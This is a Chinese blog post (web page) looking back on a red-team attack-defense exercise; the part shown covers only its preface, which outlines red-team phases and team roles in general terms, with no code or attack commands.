<!DOCTYPE html>
<html lang="zh">
  <head>
    <title>
        攻防演练复盘 - AD钙奶的博客
      </title>
        <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
    <meta name="renderer" content="webkit">
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no,email=no,adress=no">
    
    <meta name="theme-color" content="#000000" />
    
    <meta http-equiv="window-target" content="_top" />
    
    
    <meta name="description" content="近期攻防演练的复盘呦" />
    <meta name="generator" content="Hugo 0.91.2 with theme pure" />
    <title>攻防演练复盘 - AD钙奶的博客</title>
    
    
    <link rel="stylesheet" href="https://ad-calcium.github.io/css/style.min.e64d754037c0ee0ec4e20ab1d6f07740ace61729bc03850559b8caa21ae4a597.css">
    
    <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/9.15.10/styles/github.min.css" async>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css" async>
    <meta property="og:title" content="攻防演练复盘" />
<meta property="og:description" content="近期攻防演练的复盘呦" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ad-calcium.github.io/2022/08/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E5%A4%8D%E7%9B%98/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2022-08-29T00:00:00+00:00" />
<meta property="article:modified_time" content="2022-08-29T00:00:00+00:00" />
<meta property="og:see_also" content="https://ad-calcium.github.io/2023/10/%E5%8D%8E%E7%A1%95%E5%B0%8F%E4%B8%BB%E6%9C%BA%E4%BB%8E%E5%88%B7bios%E5%88%B0%E9%BB%91%E8%8B%B9%E6%9E%9C/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2023/03/%E9%BB%91%E7%BE%A4%E6%99%96dsm7.xcpu%E5%9E%8B%E5%8F%B7%E8%AF%86%E5%88%AB%E9%94%99%E8%AF%AF%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2023/03/weblogic%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Ccve-2023-21839/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2023/02/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%89%B0%E9%9A%BE%E7%9A%84web%E6%89%93%E7%82%B9/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2023/02/%E9%BB%91%E7%BE%A4%E6%99%96dsm7.x%E5%BC%95%E5%AF%BC%E7%94%A8arpl%E7%BC%96%E8%AF%91%E6%95%99%E7%A8%8B/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2023/02/%E9%BB%91%E7%BE%A4%E8%BE%89%E6%B4%97%E7%99%BD%E6%96%B9%E6%A1%88-7.x%E7%89%88%E6%9C%AC/" />

<meta itemprop="name" content="攻防演练复盘">
<meta itemprop="description" content="近期攻防演练的复盘呦"><meta itemprop="datePublished" content="2022-08-29T00:00:00+00:00" />
<meta itemprop="dateModified" content="2022-08-29T00:00:00+00:00" />
<meta itemprop="wordCount" content="5113">
<meta itemprop="keywords" content="攻防演练," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="攻防演练复盘"/>
<meta name="twitter:description" content="近期攻防演练的复盘呦"/>

    <!--[if lte IE 9]>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
      <![endif]-->

    <!--[if lt IE 9]>
        <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
      <![endif]-->
  </head>

  
  

  <body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage"><header class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="slimContent">
      <div class="navbar-header">
        <div class="profile-block text-center">
          <a id="avatar" href="https://github.com/ad-calcium" target="_blank">
            <img class="img-circle img-rotate" src="https://ad-calcium.github.io/avatar.png" width="200" height="200">
          </a>
          <h2 id="name" class="hidden-xs hidden-sm">AD钙奶</h2>
          <h3 id="title" class="hidden-xs hidden-sm hidden-md"></h3>
          <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i>China</small>
        </div><div class="search" id="search-form-wrap">
    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i
                        class="icon icon-search"></i></button>
            </span>
        </div>
        <div class="ins-search">
            <div class="ins-search-mask"></div>
            <div class="ins-search-container">
                <div class="ins-input-wrapper">
                    <input type="text" class="ins-search-input" placeholder="想要查找什么..."
                        x-webkit-speech />
                    <button type="button" class="close ins-close ins-selectable" data-dismiss="modal"
                        aria-label="Close"><span aria-hidden="true">×</span></button>
                </div>
                <div class="ins-section-wrapper">
                    <div class="ins-section-container"></div>
                </div>
            </div>
        </div>
    </form>
</div>
        <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
      </div>
      <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
        <ul class="nav navbar-nav main-nav">
            <li class="menu-item menu-item-home">
                <a href="/">
                    <i class="icon icon-home-fill"></i>
                  <span class="menu-title">Home</span>
                </a>
            </li>
            <li class="menu-item menu-item-archives">
                <a href="/posts/">
                    <i class="icon icon-archives-fill"></i>
                  <span class="menu-title">Archives</span>
                </a>
            </li>
            <li class="menu-item menu-item-categories">
                <a href="/categories/">
                    <i class="icon icon-folder"></i>
                  <span class="menu-title">Categories</span>
                </a>
            </li>
            <li class="menu-item menu-item-tags">
                <a href="/tags/">
                    <i class="icon icon-tags"></i>
                  <span class="menu-title">Tags</span>
                </a>
            </li>
        </ul>
      </nav>
    </div>
  </header>

<aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content"><p>不忘初心方能始终</p>
            </div>
        </div>
    </div>
</div>

      <div class="widget">
    <h3 class="widget-title"> 标签</h3>
    <div id="tag-cloud-list" class="widget-body">
            
            
            <a href="https://ad-calcium.github.io/tags/cobalt-strike/" class="tag-list-link" rel="1">cobalt-strike<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/confluence/" class="tag-list-link" rel="1">confluence<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/exchange%E7%B3%BB%E5%88%97/" class="tag-list-link" rel="2">exchange系列<span
               class="tag-list-count">2</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/linux%E6%8F%90%E6%9D%83/" class="tag-list-link" rel="1">linux提权<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/mssql/" class="tag-list-link" rel="3">mssql<span
               class="tag-list-count">3</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/mssql%E6%8F%90%E6%9D%83/" class="tag-list-link" rel="2">mssql提权<span
               class="tag-list-count">2</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/mysql%E6%8F%90%E6%9D%83/" class="tag-list-link" rel="1">mysql提权<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/spring/" class="tag-list-link" rel="2">spring<span
               class="tag-list-count">2</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/web/" class="tag-list-link" rel="2">web<span
               class="tag-list-count">2</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/web%E5%AE%89%E5%85%A8/" class="tag-list-link" rel="7">web安全<span
               class="tag-list-count">7</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/web%E6%B8%97%E9%80%8F/" class="tag-list-link" rel="1">web渗透<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/win10%E7%9B%B8%E5%85%B3/" class="tag-list-link" rel="1">win10相关<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/zabbix/" class="tag-list-link" rel="1">zabbix<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" class="tag-list-link" rel="3">信息收集<span
               class="tag-list-count">3</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91/" class="tag-list-link" rel="1">内网<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="tag-list-link" rel="12">内网渗透<span
               class="tag-list-count">12</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" class="tag-list-link" rel="4">内网环境搭建<span
               class="tag-list-count">4</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%87%AD%E6%8D%AE%E7%AA%83%E5%8F%96/" class="tag-list-link" rel="1">凭据窃取<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%90%91%E6%97%A5%E8%91%B5/" class="tag-list-link" rel="1">向日葵<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" class="tag-list-link" rel="6">域渗透<span
               class="tag-list-count">6</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%AE%89%E8%A3%85%E5%8D%9A%E5%AE%A2/" class="tag-list-link" rel="1">安装博客<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="tag-list-link" rel="2">小技巧<span
               class="tag-list-count">2</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/" class="tag-list-link" rel="1">攻防演练<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%9C%AA%E6%8E%88%E6%9D%83/" class="tag-list-link" rel="1">未授权<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="tag-list-link" rel="1">横向移动<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86/" class="tag-list-link" rel="1">流量代理<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="tag-list-link" rel="1">渗透测试<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="tag-list-link" rel="28">漏洞复现<span
               class="tag-list-count">28</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8/" class="tag-list-link" rel="1">端口复用<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E7%BC%96%E5%86%99yaml%E6%A0%BC%E5%BC%8F%E7%9A%84poc/" class="tag-list-link" rel="1">编写yaml格式的poc<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85/" class="tag-list-link" rel="1">软件安装<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E9%92%93%E9%B1%BC/" class="tag-list-link" rel="1">钓鱼<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E9%BB%91%E7%BE%A4%E8%BE%89/" class="tag-list-link" rel="3">黑群辉<span
               class="tag-list-count">3</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/" class="tag-list-link" rel="1">黑苹果<span
               class="tag-list-count">1</span></a>
            
    </div>
<script>
document.onreadystatechange = () => {
  if (document.readyState === 'complete') {
    tagCloud('#tag-cloud-list a',  15 ,  30 );
  }
};

function tagCloud(where, min, max) {
  let iMax = 0;
  let iMin = 0;
  $(where).each(function() {
    let weight = Number($(this).attr("rel"));
    if(iMax < weight) iMax = weight;
    if(iMin > weight || iMin == 0) iMin = weight;
  });
  let step = (max - min)/(iMax - iMin);
  $(where).each(function() {
    let weight = $(this).attr("rel") - iMin;
    $(this).css({"font-size": min + (weight * step) + 'px'});
  });
};
</script>
</div>

      <div class="widget">
    <h3 class="widget-title"> 分类</h3>
    <div class="widget-body">
        <ul class="category-list">
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/cobalt-strike/" class="category-list-link">cobalt-strike</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/exchange%E7%B3%BB%E5%88%97/" class="category-list-link">exchange系列</a><span class="category-list-count">2</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/nas/" class="category-list-link">nas</a><span class="category-list-count">3</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/sql%E6%B3%A8%E5%85%A5/" class="category-list-link">sql注入</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/web%E5%AE%89%E5%85%A8/" class="category-list-link">web安全</a><span class="category-list-count">4</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" class="category-list-link">信息收集</a><span class="category-list-count">3</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="category-list-link">内网渗透</a><span class="category-list-count">6</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%86%85%E7%BD%91%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" class="category-list-link">内网环境搭建</a><span class="category-list-count">4</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%87%AD%E6%8D%AE%E7%AA%83%E5%8F%96/" class="category-list-link">凭据窃取</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="category-list-link">小技巧</a><span class="category-list-count">4</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%8A%98%E8%85%BE/" class="category-list-link">折腾</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/" class="category-list-link">攻防演练</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%95%B0%E6%8D%AE%E5%BA%93/" class="category-list-link">数据库</a><span class="category-list-count">3</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%9C%AA%E6%8E%88%E6%9D%83%E6%BC%8F%E6%B4%9E/" class="category-list-link">未授权漏洞</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="category-list-link">横向移动</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="category-list-link">渗透测试</a><span class="category-list-count">2</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="category-list-link">漏洞复现</a><span class="category-list-count">32</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E7%BC%96%E5%86%99yaml%E6%A0%BC%E5%BC%8F%E7%9A%84poc/" class="category-list-link">编写yaml格式的poc</a><span class="category-list-count">1</span></li>
        </ul>
    </div>
</div>
      <div class="widget">
    <h3 class="widget-title"> 标签</h3>
    <div class="widget-body">
        <ul class="tag-list">
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/cobalt-strike/" class="tag-list-link">cobalt-strike</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/confluence/" class="tag-list-link">confluence</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/exchange%E7%B3%BB%E5%88%97/" class="tag-list-link">exchange系列</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/linux%E6%8F%90%E6%9D%83/" class="tag-list-link">linux提权</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/mssql/" class="tag-list-link">mssql</a><span
                    class="tag-list-count">3</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/mssql%E6%8F%90%E6%9D%83/" class="tag-list-link">mssql提权</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/mysql%E6%8F%90%E6%9D%83/" class="tag-list-link">mysql提权</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/spring/" class="tag-list-link">spring</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/web/" class="tag-list-link">web</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/web%E5%AE%89%E5%85%A8/" class="tag-list-link">web安全</a><span
                    class="tag-list-count">7</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/web%E6%B8%97%E9%80%8F/" class="tag-list-link">web渗透</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/win10%E7%9B%B8%E5%85%B3/" class="tag-list-link">win10相关</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/zabbix/" class="tag-list-link">zabbix</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" class="tag-list-link">信息收集</a><span
                    class="tag-list-count">3</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91/" class="tag-list-link">内网</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="tag-list-link">内网渗透</a><span
                    class="tag-list-count">12</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" class="tag-list-link">内网环境搭建</a><span
                    class="tag-list-count">4</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%87%AD%E6%8D%AE%E7%AA%83%E5%8F%96/" class="tag-list-link">凭据窃取</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%90%91%E6%97%A5%E8%91%B5/" class="tag-list-link">向日葵</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" class="tag-list-link">域渗透</a><span
                    class="tag-list-count">6</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%AE%89%E8%A3%85%E5%8D%9A%E5%AE%A2/" class="tag-list-link">安装博客</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="tag-list-link">小技巧</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/" class="tag-list-link">攻防演练</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%9C%AA%E6%8E%88%E6%9D%83/" class="tag-list-link">未授权</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="tag-list-link">横向移动</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86/" class="tag-list-link">流量代理</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="tag-list-link">渗透测试</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="tag-list-link">漏洞复现</a><span
                    class="tag-list-count">28</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8/" class="tag-list-link">端口复用</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E7%BC%96%E5%86%99yaml%E6%A0%BC%E5%BC%8F%E7%9A%84poc/" class="tag-list-link">编写yaml格式的poc</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85/" class="tag-list-link">软件安装</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E9%92%93%E9%B1%BC/" class="tag-list-link">钓鱼</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E9%BB%91%E7%BE%A4%E8%BE%89/" class="tag-list-link">黑群辉</a><span
                    class="tag-list-count">3</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/" class="tag-list-link">黑苹果</a><span
                    class="tag-list-count">1</span></li>
            
        </ul>

    </div>
</div>
      
<div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
        <ul class="recent-post-list list-unstyled no-thumbnail">
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2023/10/%E5%8D%8E%E7%A1%95%E5%B0%8F%E4%B8%BB%E6%9C%BA%E4%BB%8E%E5%88%B7bios%E5%88%B0%E9%BB%91%E8%8B%B9%E6%9E%9C/" class="title">华硕小主机从刷bios到黑苹果</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2023-10-06 00:00:00 &#43;0000 UTC" itemprop="datePublished">2023-10-06</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2023/03/%E9%BB%91%E7%BE%A4%E6%99%96dsm7.xcpu%E5%9E%8B%E5%8F%B7%E8%AF%86%E5%88%AB%E9%94%99%E8%AF%AF%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/" class="title">黑群晖DSM7.XCPU型号识别错误的解决方法</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2023-03-13 00:00:00 &#43;0000 UTC" itemprop="datePublished">2023-03-13</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2023/03/weblogic%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Ccve-2023-21839/" class="title">weblogic命令执行(CVE-2023-21839)</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2023-03-04 00:00:00 &#43;0000 UTC" itemprop="datePublished">2023-03-04</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2023/02/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%89%B0%E9%9A%BE%E7%9A%84web%E6%89%93%E7%82%B9/" class="title">记一次艰难的web打点</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2023-02-20 00:00:00 &#43;0000 UTC" itemprop="datePublished">2023-02-20</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2023/02/%E9%BB%91%E7%BE%A4%E6%99%96dsm7.x%E5%BC%95%E5%AF%BC%E7%94%A8arpl%E7%BC%96%E8%AF%91%E6%95%99%E7%A8%8B/" class="title">黑群晖DSM7.X引导用arpl编译教程</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2023-02-07 00:00:00 &#43;0000 UTC" itemprop="datePublished">2023-02-07</time>
                    </p>
                </div>
            </li>
        </ul>
    </div>
</div>
  </div>
</aside>

    
    
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <h4 class="toc-title">文章目录</h4>
    <nav id="toc" class="js-toc toc">

    </nav>
  </div>
</aside>
<main class="main" role="main"><div class="content">
  <article id="-" class="article article-type-" itemscope
    itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      <h1 itemprop="name">
  <a
    class="article-title"
    href="/2022/08/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E5%A4%8D%E7%9B%98/"
    >攻防演练复盘</a
  >
</h1>

      <div class="article-meta">
        
<span class="article-date">
  <i class="icon icon-calendar-check"></i>&nbsp;
<a href="https://ad-calcium.github.io/2022/08/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E5%A4%8D%E7%9B%98/" class="article-date">
  <time datetime="2022-08-29 00:00:00 &#43;0000 UTC" itemprop="datePublished">2022-08-29</time>
</a>
</span>
<span class="article-category">
  <i class="icon icon-folder"></i>&nbsp;
  <a class="article-category-link" href="/categories/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/"> 攻防演练 </a>
</span>  
  <span class="article-tag">
    <i class="icon icon-tags"></i>&nbsp;
    <a class="article-tag-link" href="/tags/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/"> 攻防演练 </a>
  </span>

		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 5113字</span>
		<span class="post-readcount hidden-xs" itemprop="timeRequired">阅读时长: 11分 </span>
      </div>
    </div>
    <div class="article-entry marked-body js-toc-content" itemprop="articleBody">
      <h2 id="0x01-前言">0x01 前言</h2>
<p>红队的攻击是一项系统的工作，整个攻击过程是有章可循、科学合理的，涵盖了从前期准备、攻击实施到靶标控制的各个步骤和环节。按照任务进度划分，一般可以将红队的工作分为 4 个阶段：准备工作、目标网情搜集、外网纵向突破和内网横向拓展</p>
<p><img src="images/image-20220823164157-df7lf32.png" alt="image"></p>
<h3 id="11-团队协作">1.1 团队协作</h3>
<p>攻击队主要包含行动总指挥、情报搜集人员、武器装备制造人员、打点实施人员、社工钓鱼人员、内网渗透人员等角色。随着实战攻防演练的不断深入，防守队的整体能力持续提升，这就使得攻击队人员凭个人能力单打独斗取得胜利的希望越来越小。而由 3～5 人组成的攻击小队，通过分工协作高效完成攻击行动的模式越来越成熟。是否拥有团队协作的作战经验，团队中各成员分别扮演什么样的角色，是蓝队实战化能力的重要指标。团队作战，成功的关键是协作与配合。通常来说，每支攻击队的成员都会有非常明确的分工和角色。在实战攻防演练中，<strong>攻击队比较常见的角色分工主要有 6 种，分别是行动总指挥、情报搜集人员、武器装备制造人员、打点实施人员、社工钓鱼人员和内网渗透人员</strong>。</p>
<p>1）行动总指挥：通常是攻击队中综合能力最强的人，需要有较强的组织意识、应变能力和丰富的实战经验。负责策略制订、任务分发、进度把控等。
2）情报搜集人员：负责情报侦察和信息搜集，搜集的内容包括但不限于目标系统的组织架构、IT 资产、敏感信息泄露、供应商信息等。
3）武器装备制造人员：负责漏洞挖掘及工具编写，是攻击队的核心战斗力量，不仅要能找到并利用漏洞，还要力求在不同环境下达到稳定、深入的漏洞利用。
4）打点实施人员：负责获取接入点，进行 Web 渗透等。找到薄弱环节后，利用漏洞或社工等方法，获取外网系统控制权限；之后寻找和内网连通的通道，建立据点（跳板）。
5）社工钓鱼人员：负责社工攻击。利用人的安全意识不足或安全能力不足等弱点，实施社会工程学攻击，通过钓鱼邮件或社交平台等进行诱骗，进而打入内网。
